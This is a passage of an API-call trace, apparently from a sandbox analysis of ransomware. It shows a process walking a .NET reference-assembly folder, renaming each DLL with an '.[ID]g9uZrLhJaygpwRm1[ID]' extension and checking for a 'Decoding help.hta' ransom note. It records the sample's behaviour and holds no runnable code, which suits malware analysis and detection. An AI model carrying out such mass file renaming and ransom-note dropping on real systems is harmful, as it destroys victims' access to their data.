returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll" [0058.092] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll" [0058.092] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.093] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.io.log.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.io.log.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.093] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab0aae57, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xab0aae57, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xab1db959, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Printing.dll", cAlternateFileName="")) returned 1 [0058.093] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.093] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.093] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.093] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.093] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Printing.dll") returned -1 [0058.093] lstrlenW (lpString="System.Printing.dll") returned 19 [0058.093] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.093] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.093] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Printing.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll" [0058.093] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll" [0058.093] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.093] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.printing.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.printing.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.093] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb45bd12a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb45bd12a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb45e328a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xed000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Runtime.Serialization.dll", cAlternateFileName="")) returned 1 [0058.093] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.093] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.093] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.093] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.094] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Runtime.Serialization.dll") returned -1 [0058.094] lstrlenW (lpString="System.Runtime.Serialization.dll") returned 32 [0058.094] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.094] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.094] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.094] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Runtime.Serialization.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll" [0058.094] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll" [0058.094] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.094] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.runtime.serialization.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.runtime.serialization.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.094] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4524ba9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb4524ba9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb4596fca, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5b6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ServiceModel.dll", cAlternateFileName="")) returned 1 [0058.094] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.094] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.094] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.094] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.094] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.ServiceModel.dll") returned -1 [0058.094] lstrlenW (lpString="System.ServiceModel.dll") returned 23 [0058.094] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.094] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.094] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.ServiceModel.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll" [0058.094] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll" [0058.095] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.servicemodel.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.servicemodel.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.095] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1158c, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0x6f1158c, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0x7ac6bc9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xa8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Speech.dll", cAlternateFileName="")) returned 1 [0058.095] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.095] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.095] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.095] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.095] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Speech.dll") returned -1 [0058.095] lstrlenW (lpString="System.Speech.dll") returned 17 [0058.095] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.095] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.095] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Speech.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll" [0058.095] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll" [0058.095] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.speech.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.speech.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.095] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44b2788, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb44b2788, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb44d88e8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x117000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Workflow.Activities.dll", cAlternateFileName="")) returned 1 [0058.095] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.095] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.096] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.096] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.096] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Workflow.Activities.dll") returned -1 [0058.096] lstrlenW (lpString="System.Workflow.Activities.dll") returned 30 [0058.096] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.096] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.096] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.096] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Workflow.Activities.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll" [0058.096] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll" [0058.096] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.activities.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.activities.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.096] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44664c7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb44664c7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb44b2788, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Workflow.ComponentModel.dll", cAlternateFileName="")) returned 1 [0058.096] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.096] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.096] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.096] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.096] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Workflow.ComponentModel.dll") returned -1 [0058.096] lstrlenW (lpString="System.Workflow.ComponentModel.dll") returned 34 [0058.096] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.096] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.097] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Workflow.ComponentModel.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll" [0058.097] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll" [0058.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.097] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.componentmodel.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference 